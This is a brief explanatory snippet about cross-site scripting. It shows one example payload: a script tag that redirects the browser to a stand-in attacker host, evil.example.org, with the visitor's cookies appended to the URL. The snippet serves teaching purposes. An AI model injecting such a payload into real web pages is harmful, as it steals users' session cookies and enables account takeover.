XSS attacks can be anything. This script steals the user's cookies.

<script>
document.location =
'http://evil.example.org/steal-cookies.php'
+ '?cookies=' + document.cookie 
</script>